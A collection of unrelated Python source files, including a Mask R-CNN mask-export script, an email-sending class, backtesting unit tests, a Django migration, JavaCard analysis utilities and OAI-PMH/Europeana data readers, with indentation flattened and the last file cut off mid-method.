############################################################
if __name__ == '__main__':
# Load dataset
config = BalloonConfig()
BALLOON_DIR = os.path.join(ROOT_DIR, "datasets/test")
dataset = BalloonDataset()
dataset.load_balloon(BALLOON_DIR, "val")
if not(os.path.isdir(BALLOON_DIR + '/result')):
os.makedirs(os.path.join(BALLOON_DIR + '/result'))
# Must call before using the dataset
dataset.prepare()
print("Image Count: {}".format(len(dataset.image_ids)))
print("Class Count: {}".format(dataset.num_classes))
for i, info in enumerate(dataset.class_info):
print("{:3}. {:50}".format(i, info['name']))
# Load and save mask image
image_ids = dataset.image_ids
for image_id in image_ids:
image = dataset.load_image(image_id)
mask, class_ids, filename = dataset.load_mask(image_id)
filename = filename.split('.')[0] + '.png'
print(class_ids)
print(image_id)
print(filename)
mask_ = mask[:,:,0]
if len(class_ids) >= 1:
for i in range(1,len(class_ids)):
mask_ += mask[:,:,i]
skimage.io.imsave(BALLOON_DIR + "/result/%s" %filename,mask_)
#cv2.imwrite(BALLOON_DIR + "/result/%s" %filename,mask_) |
# Rudigus - OBI 2018 - Programação Nível Senior - Fase 1 - Figurinhas da copa
n, c, m = input().split()
x = input().split()
y = input().split()
figurinhasFaltando = len(x)
for i in range(len(y)):
for j in range(len(x)):
if(y[i] == x[j]):
figurinhasFaltando -= 1
x[j] = -1
print(figurinhasFaltando)
|
# -*- coding:utf-8 -*-
__author__ = "jake"
__email__ = "jakejie@163.com"
"""
Project:StayOrder
FileName = PyCharm
Version:1.0
CreateDay:2018/10/20 9:52
"""
import smtplib
from email.header import Header
from email.mime.text import MIMEText
from email.utils import parseaddr, formataddr
try:
from . import config
except Exception as im_err:
try:
import config
except Exception as im_err:
print("sent_email 包导入错误:{}".format(im_err))
# 邮件发送
class SendEmail(object):
# 发送邮箱设置
email_server = config.EMAIL_HOST
from_address = config.EMAIL_HOST_USER
password = config.EMAIL_HOST_PASSWORD
def __init__(self, text, sender, receiver, subject, address):
self.text = text
self.sender = sender
self.receiver = receiver
self.subject = subject
self.address = address
self.to_address = address
# 从上到下依次是: 邮件内容,邮件发送者昵称,邮件接收者昵称,邮件主题
self.msg = MIMEText(self.text, 'plain', 'utf-8')
self.msg['From'] = self.format_address(self.sender + '<' + self.from_address + '>')
self.msg['To'] = self.format_address(self.receiver + '<' + self.to_address + '>')
self.msg['Subject'] = Header(self.subject, 'utf-8').encode()
# 编写了一个函数format_address()来格式化一个邮件地址
@staticmethod
def format_address(s):
name, address = parseaddr(s)
return formataddr((Header(name, 'utf-8').encode(), address))
def send(self):
try:
# server = smtplib.SMTP(self.email_server, 25) # 25是普通接口,465 SSL接口
server = smtplib.SMTP_SSL(self.email_server, 465)
# server.starttls() # SSL要求这句
server.set_debuglevel(1)
server.login(self.from_address, self.password)
server.sendmail(self.from_address, [self.to_address], self.msg.as_string())
server.quit()
except Exception as email_err:
print("邮件发送失败:{}".format(email_err))
if __name__ == '__main__':
# address_list = ["lucien33@live.com","rdvparis75015@gmail.com"]
address_list = ['794564669@qq.com',]
for add in address_list:
send_email = SendEmail('这是一封测试邮件的中文内容', '这是来自RDV', '{}'.format(add), '恭喜 预约成功', add)
send_email.send()
|
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest.mock import patch
from pandas import date_range
from qf_lib.backtesting.alpha_model.exposure_enum import Exposure
from qf_lib.backtesting.signals.backtest_signals_register import BacktestSignalsRegister
from qf_lib.backtesting.signals.signal import Signal
from qf_lib.common.tickers.tickers import BloombergTicker
from qf_lib.common.utils.dateutils.relative_delta import RelativeDelta
from qf_lib.common.utils.dateutils.string_to_date import str_to_date
from qf_lib.containers.dataframe.qf_dataframe import QFDataFrame
from qf_lib.containers.futures.future_tickers.bloomberg_future_ticker import BloombergFutureTicker
class TestSignalsRegister(unittest.TestCase):
def test_get_signals__single_contract(self):
"""
Save signals, which belong to one ticker (contract). The returned signals data frame should contain only one
column, named after the ticker and used model.
"""
ticker = BloombergTicker("Example Index")
number_of_days = 30
start_date = str_to_date("2000-01-01")
end_date = start_date + RelativeDelta(days=number_of_days-1)
signals_register = BacktestSignalsRegister()
for date in date_range(start_date, end_date, freq="D"):
signals_register.save_signals([Signal(ticker, Exposure.LONG, 0.0, 17, date)])
signals_df = signals_register.get_signals()
self.assertEqual(type(signals_df), QFDataFrame)
self.assertEqual(signals_df.shape, (number_of_days, 1))
def test_get_signals__multiple_tickers(self):
"""
Save signals, which belong to multiple tickers.
"""
tickers = [BloombergTicker("Example Index"), BloombergTicker("Example 2 Index")]
number_of_days = 30
start_date = str_to_date("2000-01-01")
end_date = start_date + RelativeDelta(days=number_of_days - 1)
signals_register = BacktestSignalsRegister()
for date in date_range(start_date, end_date, freq="D"):
signals_register.save_signals([Signal(ticker, Exposure.LONG, 0.0, 17, date) for ticker in tickers])
signals_df = signals_register.get_signals()
self.assertEqual(type(signals_df), QFDataFrame)
self.assertEqual(signals_df.shape, (number_of_days, 2))
def test_get_signals__one_ticker_multiple_signals(self):
"""
Save signals belonging to one ticker. In this case, even if multiple different signals will be generated for
one date, only one of them will be returned (always the first one).
"""
ticker = BloombergTicker("Example Index")
number_of_days = 30
start_date = str_to_date("2000-01-01")
end_date = start_date + RelativeDelta(days=number_of_days - 1)
signals_register = BacktestSignalsRegister()
for date in date_range(start_date, end_date, freq="D"):
signals_register.save_signals([Signal(ticker, Exposure.LONG, 0.0, 17, date)])
signals_register.save_signals([Signal(ticker, Exposure.SHORT, 0.0, 17, date)])
signals_df = signals_register.get_signals()
self.assertEqual(type(signals_df), QFDataFrame)
self.assertEqual(signals_df.shape, (number_of_days, 1))
for column, tms in signals_df.iteritems():
self.assertTrue(all(s.suggested_exposure == Exposure.LONG for s in tms))
@patch.object(BloombergFutureTicker, "ticker")
def test_get_signals__one_future_ticker(self, ticker_mock):
fut_ticker_1 = BloombergFutureTicker("Ticker name", "family id", 1, 1)
ticker_mock.return_value = "Specific ticker"
number_of_days = 30
start_date = str_to_date("2000-01-01")
rolling_date = start_date + RelativeDelta(days=number_of_days - 1)
signals_register = BacktestSignalsRegister()
for date in date_range(start_date, rolling_date, freq="D"):
signals_register.save_signals([Signal(fut_ticker_1, Exposure.LONG, 0.0, 17, date)])
signals_df = signals_register.get_signals()
self.assertEqual(type(signals_df), QFDataFrame)
self.assertEqual(signals_df.shape, (number_of_days, 1))
|
# Generated by Django 3.1.5 on 2021-05-19 17:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('financeiro', '0012_auto_20210514_1913'),
]
operations = [
migrations.AlterField(
model_name='despesa',
name='repetir',
field=models.CharField(choices=[('n', 'Nunca'), ('m', 'Mensalmente'), ('a', 'Anualmente')], max_length=1, verbose_name='Repetir'),
),
]
|
import unittest
class WorkSpaceTestCase(unittest.TestCase):
def test_adding_custom_folder_to_ignore_files(self):
from fandogh_cli.workspace import Workspace
custom_entries = ["folder{}".format(i) for i in range(5)]
ignore_folders = ["behrooz", "git", ".git"]
expected_list = custom_entries + ignore_folders
entries = Workspace.add_custom_ignore_folder_to_entries(entries=custom_entries, ignore_folders=ignore_folders)
self.assertEqual(entries, expected_list)
def test_adding_custom_folder_when_they_already_in_files(self):
from fandogh_cli.workspace import Workspace
custom_entries = ["folder{}".format(i) for i in range(5)]
ignore_folders = ["behrooz", "git", ".git", "behrooz", "behrooz", "behrooz", "behrooz", "something"]
unique_ignore_folders = list(dict.fromkeys(ignore_folders))
expected_list = custom_entries + unique_ignore_folders
entries = Workspace.add_custom_ignore_folder_to_entries(entries=custom_entries, ignore_folders=ignore_folders)
self.assertEqual(entries, expected_list)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python3
import argparse
import configparser
import enum
import logging
import os
import re
import subprocess
import sys
import time
from contextlib import contextmanager
import pathlib
import bson
# from collections import namedtuple
from typing import List, NamedTuple, Optional
import pymongo
from javus.settings import LIB_DIR
log = logging.getLogger(__file__)
handler = logging.StreamHandler()
formatter = logging.Formatter("%(levelname)s:%(asctime)s:%(name)s: %(message)s")
handler.setFormatter(formatter)
log.addHandler(handler)
# FIXME use enum and allow 'debug' as value for --verbose
LOG_LEVELS = [
logging.DEBUG,
logging.INFO,
logging.WARNING,
logging.ERROR,
logging.CRITICAL,
]
class Error(enum.Enum):
UNSUPPORTED_PYTHON_VERSION = -1
class Timer(object):
def __init__(self):
self.start = None
self.end = None
self.duration = None
def __enter__(self, *args, **kwargs):
self.start = time.time()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.end = time.time()
self.duration = self.end - self.start
class CommandLineApp(object):
"""
Template for Python command line applications.
"""
APP_DESCRIPTION = None
def __init__(self):
self.verbosity = logging.ERROR
self.args = None
self.parser = argparse.ArgumentParser(description=self.APP_DESCRIPTION,)
self.add_subparsers()
self.add_options()
self.parse_options()
self.setup_logging()
def setup_logging(self, target_log=None):
if target_log is None:
target_log = log
old = logging.getLevelName(target_log.level)
new = logging.getLevelName(self.verbosity)
target_log.setLevel(self.verbosity)
log.debug(
"logging level for %s changed from %s to %s ", target_log.name, old, new
)
def add_subparsers(self):
r"""
Allows to add subparsers for parsing sub-commands. To be overriden
by the subclasses
"""
pass
def add_options(self):
levels = ", ".join([str(lvl) for lvl in LOG_LEVELS])
self.parser.add_argument(
"-v",
"--verbose",
help="Set the verbosity {" + levels + "}",
type=self.validate_verbosity,
)
def validate_verbosity(self, value):
# FIXME use enum.Enum - already in gppw.py
try:
value = int(value)
except ValueError:
raise argparse.ArgumentTypeError("verbosity is not an integer")
if value not in LOG_LEVELS:
raise argparse.ArgumentTypeError("verbosity level not from expected range")
return value
def parse_options(self):
self.args = self.parser.parse_args()
if self.args.verbose is not None:
self.verbosity = self.args.verbose
def run(self):
raise NotImplementedError("The method 'run' has not bee implemented!")
@contextmanager
def cd(new_path):
"""
kudos to:
https://stackoverflow.com/questions/431684/how-do-i-change-the-working-directory-in-python/13197763#13197763
"""
old_path = os.getcwd()
log.debug("Save old path: %s", old_path)
try:
log.debug("Change directory to: %s", new_path)
# no yield for now, as there is no need for additional information
os.chdir(new_path)
yield old_path
finally:
# the old directory might also be remove, however there isn't
# good and logical thing to do, so in that case the exception will be
# thrown
# FIXME Ceesjan taught to not to use format in logging!!!
log.debug("Switch back to old path: %s", old_path)
os.chdir(old_path)
# FIXME rename to load_sdks
# FIXME depends on external configuration
# TODO maybe just load them directly from the submodule and put it on SDKVersion
def load_versions(versions):
"""
parses 'jc221,jc221' etc.
returns the supported versions and orders them
from newest to oldest
"""
props = configparser.ConfigParser()
props.read(LIB_DIR / "sdkversions.properties")
known = list(props["SUPPORTED_VERSIONS"])
filtered = []
for version in versions:
if version in known:
filtered.append(version)
# sort the values based on the order of JC versions in sdkversions.properties
filtered.sort(key=known.index)
return filtered[::-1]
class JCVersion(NamedTuple):
major: Optional[int]
minor: Optional[int]
@classmethod
def from_str(cls_obj, string: str) -> "JCVersion":
r"""
Parses output from JavaCard from `JCSystem.getVersion()`, which returns
a `short` value (two bytes). In case the string is empty `self.major` and
`self.minor` will be set to `None`.
param `string`: two bytes
"""
# TODO add try/except?
try:
major = int(string[:2])
except ValueError:
major = None
try:
minor = int(string[2:])
except ValueError:
minor = None
return cls_obj(major=major, minor=minor)
def __str__(self) -> str:
# TODO how to handle 'None' self values?
return "%s.%s" % (self.major, self.minor)
def get_sdks(self) -> List["SDKVersion"]:
r"""
Returns a list of sdks, that are worth trying for the specific card.
"""
sdks = []
available_sdks = SDKVersion.get_available_sdks()
if self.major is None:
# be generous and return all the available SDKs
return available_sdks
for sdk in available_sdks:
if sdk.major < self.major:
sdks.append(sdk)
elif sdk.major == self.major:
if self.minor is None:
# in case we can't compare we'll use the sdk
sdks.append(sdk)
elif sdk.minor <= self.minor:
sdks.append(sdk)
return sdks
class SDKVersion(NamedTuple):
major: int
minor: int
patch: int
update: Optional[int]
# TODO what is 'b' in jc310b43
b_value: Optional[int]
# the original string, that was parsed to separate values
raw: str
# TODO rename cls_obj to cls
@classmethod
def from_str(cls_obj, string: str) -> "SDKVersion":
string = string.strip().lower()
# fmt: off
sdk_regex = re.compile(
r"((?P<header>jc)"
r"(?P<major>\d)"
r"(?P<minor>\d)"
r"(?P<patch>\d)"
r"((?P<type>[ub]?)"
r"(?P<type_value>\d+))?)"
)
# fmt: on
match = sdk_regex.match(string)
if match is not None:
major = int(match.group("major"))
minor = int(match.group("minor"))
patch = int(match.group("patch"))
update = None
b_value = None
if match.group("type") == "u":
update = int(match.group("type_value"))
elif match.group("type") == "b":
b_value = int(match.group("type_value"))
return cls_obj(
major=major,
minor=minor,
patch=patch,
update=update,
b_value=b_value,
raw=string,
)
@classmethod
def from_list(cls, string: str, sep: str = ",") -> List["SDKVersion"]:
sdks = []
for part in [x.strip() for x in string.split(sep=sep)]:
sdks.append(cls.from_str(part))
return sdks
def __str__(self) -> str:
return self.raw
# output = "SDK Version: %s.%s.%s." % (self.major, self.minor, self.patch)
# if self.update:
# output += "u%s" % self.update
# elif self.b_value:
# output += "b%s" % self.b_value
# return output
def __repr__(self) -> str:
return self.raw
# TODO load only once and get them from the class afterwards
@classmethod
def get_available_sdks(cls) -> List["SDKVersion"]:
sdks = []
properties = configparser.ConfigParser()
properties.read(LIB_DIR / "sdkversions.properties")
for version, _ in properties["SUPPORTED_VERSIONS"].items():
sdks.append(SDKVersion.from_str(version))
return sdks
# TODO missing other comparison methods
def __eq__(self, other) -> bool:
result = self.major == other.major
result = result and self.minor == other.minor
result = result and self.patch == other.patch
result = result and self.update == other.update
result = result and self.b_value == other.b_value
return result
class AID:
def __init__(self, string: str = "", rid: bytes = None, pix: bytes = None):
if string:
# TODO add input length checks
aid = bytes.fromhex(string)
rid = aid[:5]
if len(rid) != 5:
raise ValueError("RID from '%s' is not 5 bytes long" % string)
pix = aid[5:]
if not (0 <= len(pix) <= 11):
raise ValueError("PIX length from '%s' is not 0-11 bytes long" % string)
self.rid = rid
self.pix = pix
else:
if rid is not None:
if isinstance(rid, str):
self.rid = bytes.fromhex(rid)
elif isinstance(rid, bytes):
self.rid = rid
if pix is not None:
if isinstance(pix, str):
self.pix = bytes.fromhex(pix)
elif isinstance(pix, bytes):
self.pix = pix
else:
self.pix = bytes()
@property
def aid(self):
return self.rid + self.pix
def increase(self):
r"""Increases `self.rid` by one each time"""
byteorder = "big"
rid_len = 5
rid_as_int = int.from_bytes(self.rid, byteorder) + 1
self.rid = rid_as_int.to_bytes(rid_len, byteorder)
def __eq__(self, other):
if isinstance(other, bytes):
return self.aid == other
elif isinstance(other, self.__class__):
return self.aid == other.aid
def __str__(self):
return self.aid.hex().upper()
JC_FRAMEWORK_ISO7816 = {
"6999": {"note": "Applet selection failed", "const": "SW_APPLET_SELECT_FAILED",},
"6100": {"note": "Response bytes remaining", "const": "SW_BYTES_REMAINING_00",},
"6E00": {"note": "CLA value not supported", "const": "SW_CLA_NOT_SUPPORTED",},
"6884": {
"note": "Command chaining not supported",
"const": "SW_COMMAND_CHAINING_NOT_SUPPORTED",
},
"6986": {
"note": "Command not allowed (no current EF)",
"const": "SW_COMMAND_NOT_ALLOWED",
},
"6985": {
"note": "Conditions of use not satisfied",
"const": "SW_CONDITIONS_NOT_SATISFIED",
},
"6C00": {"note": "Correct Expected Length (Le)", "const": "SW_CORRECT_LENGTH_00",},
"6984": {"note": "Data invalid", "const": "SW_DATA_INVALID",},
"6A84": {"note": "Not enough memory space in the file", "const": "SW_FILE_FULL",},
"6983": {"note": "File invalid", "const": "SW_FILE_INVALID",},
"6A82": {"note": "File not found", "const": "SW_FILE_NOT_FOUND",},
"6A81": {"note": "Function not supported", "const": "SW_FUNC_NOT_SUPPORTED",},
"6A86": {"note": "Incorrect parameters (P1,P2)", "const": "SW_INCORRECT_P1P2",},
"6D00": {"note": "INS value not supported", "const": "SW_INS_NOT_SUPPORTED",},
"6883": {
"note": "Last command in chain expected",
"const": "SW_LAST_COMMAND_EXPECTED",
},
"6881": {
"note": "Card does not support the operation on the specified logical channel",
"const": "SW_LOGICAL_CHANNEL_NOT_SUPPORTED",
},
"9000": {"note": "No Error", "const": "SW_NO_ERROR",},
"6A83": {"note": "Record not found", "const": "SW_RECORD_NOT_FOUND",},
"6882": {
"note": "Card does not support secure messaging",
"const": "SW_SECURE_MESSAGING_NOT_SUPPORTED",
},
"6982": {
"note": "Security condition not satisfied",
"const": "SW_SECURITY_STATUS_NOT_SATISFIED",
},
"6F00": {"note": "No precise diagnosis", "const": "SW_UNKNOWN",},
"6200": {
"note": "Warning, card state unchanged",
"const": "SW_WARNING_STATE_UNCHANGED",
},
"6A80": {"note": "Wrong data", "const": "SW_WRONG_DATA",},
"6700": {"note": "Wrong length", "const": "SW_WRONG_LENGTH",},
"6B00": {"note": "Incorrect parameters (P1,P2)", "const": "SW_WRONG_P1P2",},
}
class RequestAPDU:
def __init__(self, string: str):
self.data = None
self.SW1 = None
self.SW2 = None
def success(self):
pass
class CommandAPDU:
def __init__(
self,
string: str = "",
# cla=None,
# ins=None,
# p1=None,
# p2=None,
# lc=None,
# data=None,
# le=None,
):
self.CLA = cla
self.INS = ins
self.P1 = p1
self.P2 = p2
self.Lc = lc
self.data = data
self.Le = le
class AttackConfigParser(configparser.ConfigParser):
def getlist(self, section: str, option: str, *args, sep=",", **kwargs) -> List[str]:
value = self.get(section, option)
items = value.split(sep)
return [x.strip() for x in items if x]
def get_sdk_versions(self, section: str, option: str, *args, **kwargs) -> List[str]:
strings = self.getlist(section, option, *args, **kwargs)
sdks = [SDKVersion.from_str(ver) for ver in strings]
return sdks
class PathTypeEncoder(bson.codec_options.TypeEncoder):
python_type = pathlib.PosixPath
def transform_python(self, value: pathlib.PosixPath) -> str:
return str(value)
path_codec = PathTypeEncoder()
custom_codecs = [path_codec]
type_registry = bson.codec_options.TypeRegistry(custom_codecs)
codec_options = bson.codec_options.CodecOptions(type_registry=type_registry)
# kudos to: https://medium.com/@ramojol/python-context-managers-and-the-with-statement-8f53d4d9f87
class MongoConnection(object):
def __init__(
self,
host="localhost",
port="27017",
database="javacard-analysis",
collation="commands",
):
self.host = host
self.port = port
self.connection = None
self.db_name = database
self.collation_name = collation
def __enter__(self, *args, **kwargs):
conn_str = f"mongodb://{self.host}:{self.port}"
log.debug("Starting the connection with %s", conn_str)
self.connection = pymongo.MongoClient(conn_str)
self.db = self.connection[self.db_name]
self.col = self.db.get_collection(
self.collation_name, codec_options=codec_options
)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
log.debug("Closing the connection to the database")
self.connection.close()
def get_user_consent(message, question):
print(message)
while True:
answer = input(question + " [Y/n] ").lower().strip()
if answer.startswith("y"):
return True
elif answer.startswith("n"):
return False
def proc_to_dict(proc: subprocess.CompletedProcess) -> dict:
"""
Turns `subprocess.CompletedProcess` into a dictionary.
"""
result = {}
attributes = ["args", "returncode"]
for attr in attributes:
# all those attributes should be present, but lets be cautious
try:
result[attr] = getattr(proc, attr)
except AttributeError:
pass
attributes = ["stdout", "stderr"]
for attr in attributes:
# all those attributes should be present, but lets be cautious
try:
result[attr] = getattr(proc, attr).decode("utf8")
except AttributeError:
pass
return result
if __name__ == "__main__":
app = CommandLineApp()
app.run()
|
from .epi_model import EpiModel
from .strat_model import StratifiedModel
from .utils import *
|
"""This module provides a range of readers for accessing local and remote resources.
All readers return their data as :class:`~polymatheia.data.NavigableDict`.
"""
import json
import os
from csv import DictReader
from deprecation import deprecated
from lxml import etree
from requests import get
from sickle import Sickle
from srupy import SRUpy
from polymatheia import __version__
from polymatheia.data import NavigableDict, NavigableDictIterator, LimitingIterator, xml_to_navigable_dict
class OAIMetadataFormatReader(object):
"""The class:`~polymatheia.data.reader.OAIMetadataFormatReader` is a container for OAI-PMH MetadataFormat.
The underlying library automatically handles the continuation parameters, allowing for simple iteration.
"""
def __init__(self, url):
"""Construct a new class:`~polymatheia.data.reader.OAIMetadataFormatReader`.
:param url: The base URL of the OAI-PMH server
:type url: ``str``
"""
self._url = url
def __iter__(self):
"""Return a new class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
return NavigableDictIterator(Sickle(self._url).ListMetadataFormats(),
mapper=lambda meta_format: {'schema': meta_format.schema,
'metadataPrefix': meta_format.metadataPrefix,
'metadataNamespace': meta_format.metadataNamespace})
class OAISetReader(object):
"""The class:`~polymatheia.data.reader.OAISetReader` is an iteration container for OAI-PMH Sets.
The underlying library automatically handles the continuation parameters, allowing for simple iteration.
"""
def __init__(self, url):
"""Construct a new class:`~polymatheia.data.reader.OAISetReader`.
:param url: The base URL of the OAI-PMH server
:type url: ``str``
"""
self._url = url
self._it = Sickle(url).ListSets()
def __iter__(self):
"""Return a new class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
return NavigableDictIterator(Sickle(self._url).ListSets(),
mapper=lambda oai_set: {'setSpec': oai_set.setSpec, 'setName': oai_set.setName})
class OAIRecordReader(object):
"""The :class:`~polymatheia.data.reader.OAIRecordReader` is an iteration container for OAI-PMH Records.
The underlying library automatically handles the continuation parameters, allowing for simple iteration.
"""
def __init__(self, url, metadata_prefix='oai_dc', max_records=None, set_spec=None):
"""Construct a new :class:`~polymatheia.data.reader.OAIRecordReader`.
:param url: The base URL of the OAI-PMH server
:type url: ``str``
:param metadataPrefix: The metadata prefix to use for accessing data
:type metadataPrefix: ``str``
:param max_records: The maximum number of records to return. Default (``None``) returns all records
:type max_records: ``int``
:param set_spec: The OAI Set specification for limiting which metadata to fetch
:type set_spec: ``str``
"""
self._url = url
self._metadata_prefix = metadata_prefix
self._set_spec = set_spec
self._max_records = max_records
def __iter__(self):
"""Return a new class:`~polymatheia.data.NavigableDictIterator` as the iterator.
If ``max_records`` is set, then the class:`~polymatheia.data.NavigableDictIterator` is wrapped in a
class:`~polymatheia.data.LimitingIterator`.
"""
it = NavigableDictIterator(Sickle(self._url).ListRecords(metadataPrefix=self._metadata_prefix,
set=self._set_spec,
ignore_deleted=True),
mapper=lambda record: xml_to_navigable_dict(etree.fromstring(
record.raw,
parser=etree.XMLParser(remove_comments=True))))
if self._max_records is not None:
it = LimitingIterator(it, self._max_records)
return it
class JSONReader():
"""The :class:`~polymatheia.data.reader.JSONReader` is a container for reading JSON files from the filesystem.
It is designed to provide access to data serialised using the :class:`~polymatheia.data.writer.JSONWriter`.
.. important::
It does **not** guarantee that the order of records is the same as the order in which they were written
to the local filesystem.
"""
def __init__(self, directory):
"""Create a new :class:`~polymatheia.data.reader.JSONReader`.
:param directory: The base directory within which to load the files
:type directory: ``str``
"""
self._directory = directory
self._filelist = []
for basepath, _, filenames in os.walk(directory):
for filename in filenames:
if filename.endswith('.json'):
self._filelist.append(os.path.join(basepath, filename))
def __iter__(self):
"""Return a new :class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
return NavigableDictIterator(iter(self._filelist),
mapper=self._load)
def _load(self, filename):
"""Return the next file as a :class:`~polymatheia.data.NavigableDict`."""
with open(filename) as in_f:
return json.load(in_f)
@deprecated(deprecated_in='0.2.0', removed_in='1.0.0', current_version=__version__,
details='Replaced by the polymatheia.data.reader.JSONReader')
class LocalReader(JSONReader):
"""Deprecated. Use :class:`~polymatheia.data.reader.JSONReader`."""
pass
class XMLReader():
"""The :class:`~polymatheia.data.reader.XMLReader` is a container for reading XML files from the local filesystem.
The :class:`~polymatheia.data.reader.XMLReader` will only load files that have a ".xml" extension.
"""
def __init__(self, directory):
"""Create a new :class:`~polymatheia.data.reader.XMLReader`.
:param directory: The base directory within which to load the files
:type directory: ``str``
"""
self._directory = directory
self._filelist = []
for basepath, _, filenames in os.walk(directory):
for filename in filenames:
if filename.endswith('.xml'):
self._filelist.append(os.path.join(basepath, filename))
def __iter__(self):
"""Return a new :class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
return NavigableDictIterator(iter(self._filelist),
mapper=self._load)
def _load(self, filename):
"""Return the next file as a :class:`~polymatheia.data.NavigableDict`."""
with open(filename) as in_f:
return xml_to_navigable_dict(etree.parse(in_f, parser=etree.XMLParser(remove_comments=True)).getroot())
class EuropeanaSearchReader(object):
"""The :class:`~polymatheia.data.reader.EuropeanaSearchReader` provides access to the Europeana Search API.
The initial search is run immediately on creating a new :class:`~polymatheia.data.reader.EuropeanaSearchReader`.
The iterator will automatically paginate through the full set of result pages.
.. attribute:: result_count
:type: ``int``
The total number of records returned by the search.
.. attribute:: facets
:type: ``list`` of :class:`~polymatheia.data.NavigableDict`
The facets generated by the search. This is only set if the ``profile`` parameter is set to ``'facets'``.
"""
def __init__(self, api_key, query, max_records=None, query_facets=None, media=None, thumbnail=None,
reusability=None, profile=None):
"""Create a new :class:`~polymatheia.data.reader.EuropeanaSearchReader`.
:param api_key: The Europeana API key
:type api_key: ``str``
:param query: The query string
:type query: ``str``
:param max_records: The maximum number of records to return. Defaults to all records
:type max_records: ``int``
:param query_facets: The list of query facets to apply to the search
:type query_facets: ``list`` of ``str``
:param media: Whether to require that matching records have media attached. Defaults to no requirement
:type media: ``bool``
:param thumbnail: Whether to require that matching records have a thumbnail. Defaults to no requirement
:type thumbnail: ``bool``
:param reusability: The reusability (rights) to require. Defaults to no limits
:type reusability: ``str``
:param profile: The result profile to request. Defaults to ``'standard'``
:type profile: ``str``
"""
self._api_key = api_key
self._query = query
self._max_records = max_records
self._cursor = '*'
self._offset = 0
self._query_facets = query_facets
self._media = media
self._thumbnail = thumbnail
self._reusability = reusability
self._profile = profile
it = iter(self)
self.result_count = it.result_count
self.facets = it.facets
def __iter__(self):
"""Return this :class:`~polymatheia.data.reader.EuropeanaSearchReader`` as the iterator."""
return EuropeanaSearchIterator(self._api_key, self._query, self._max_records, self._query_facets, self._media,
self._thumbnail, self._reusability, self._profile)
class EuropeanaSearchIterator(object):
"""The :class:`~polymatheia.data.reader.EuropeanaSearchIterator` provides an iterator for the Europeana Search API.
The initial search is run immediately on creating a new :class:`~polymatheia.data.reader.EuropeanaSearchIterator`.
The iterator will automatically paginate through the full set of result pages.
.. attribute:: result_count
:type: ``int``
The total number of records returned by the search.
.. attribute:: facets
:type: ``list`` of :class:`~polymatheia.data.NavigableDict`
The facets generated by the search. This is only set if the ``profile`` parameter is set to ``'facets'``.
"""
def __init__(self, api_key, query, max_records=None, query_facets=None, media=None, thumbnail=None,
reusability=None, profile=None):
"""Create a new :class:`~polymatheia.data.reader.EuropeanaSearchReader`.
:param api_key: The Europeana API key
:type api_key: ``str``
:param query: The query string
:type query: ``str``
:param max_records: The maximum number of records to return. Defaults to all records
:type max_records: ``int``
:param query_facets: The list of query facets to apply to the search
:type query_facets: ``list`` of ``str``
:param media: Whether to require that matching records have media attached. Defaults to no requirement
:type media: ``bool``
:param thumbnail: Whether to require that matching records have a thumbnail. Defaults to no requirement
:type thumbnail: ``bool``
:param reusability: The reusability (rights) to require. Defaults to no limits
:type reusability: ``str``
:param profile: The result profile to request. Defaults to ``'standard'``
:type profile: ``str``
"""
self._api_key = api_key
self._query = query
self._max_records = max_records
self._cursor = '*'
self._offset = 0
self._query_facets = query_facets
self._media = media
self._thumbnail = thumbnail
self._reusability = reusability
self._profile = profile
self.result_count = 0
self.facets = None
self._run_search()
def __iter__(self):
"""Return this :class:`~polymatheia.data.reader.EuropeanaSearchIterator`` as the iterator."""
return self
def __next__(self):
"""Return the next record as a :class:`~polymatheia.data.NavigableDict``.
:raises StopIteration: If no more Records are available
"""
if self._max_records is not None:
self._max_records = self._max_records - 1
if self._max_records < 0:
raise StopIteration()
try:
return NavigableDict(next(self._it))
except StopIteration:
if self._offset < self.result_count:
self._run_search()
return NavigableDict(next(self._it))
else:
raise StopIteration()
def _run_search(self):
"""Run the actual search query."""
params = [('wskey', self._api_key),
('query', self._query),
('cursor', self._cursor)]
if self._max_records and self._max_records < 50:
params.append(('rows', self._max_records))
else:
params.append(('rows', 50))
if self._query_facets:
params.extend([('qf', qf) for qf in self._query_facets])
if self._media is not None:
params.append(('media', 'true' if self._media else 'false'))
if self._thumbnail is not None:
params.append(('thumbnail', 'true' if self._thumbnail else 'false'))
if self._reusability is not None:
params.append(('reusability', self._reusability))
if self._profile is not None:
params.append(('profile', self._profile))
response = get('https://api.europeana.eu/record/v2/search.json', params=params)
if response.status_code == 200:
data = response.json()
self._it = iter(data['items'])
self.result_count = data['totalResults']
self._offset = self._offset + data['itemsCount']
if 'nextCursor' in data:
self._cursor = data['nextCursor']
if 'facets' in data:
self.facets = [NavigableDict(facet) for facet in data['facets']]
else:
raise Exception(response.json()['error'])
class CSVReader(object):
"""The :class:`~polymatheia.data.reader.CSVReader` provides access to a CSV file."""
def __init__(self, source):
"""Create a new :class:`~polymatheia.data.reader.CSVReader`.
:param source: The source to load the CSV from. Can either be a ``str`` filename or a file-like object
"""
if isinstance(source, str):
self._file = open(source)
else:
self._file = source
def __iter__(self):
"""Return this :class:`~polymatheia.data.reader.CSVReader` as the iterator."""
if self._file.seekable():
self._file.seek(0)
return NavigableDictIterator(iter(DictReader(self._file)))
class SRUExplainRecordReader(object):
"""The class:`~polymatheia.data.reader.SRUExplainRecordReader` is a container for SRU Explain Records."""
def __init__(self, url):
"""Construct a new class:`~polymatheia.data.reader.SRUExplainRecordReader`.
:param url: The base URL of the SRU server
:type url: ``str``
"""
self._url = url
self._explain = SRUpy(self._url).explain()
self.schemas = [(schema["@name"], schema.title)
for schema in NavigableDict(self._explain).explain.schemaInfo.schema]
self.echo = NavigableDict(self._explain.echo)
def __iter__(self):
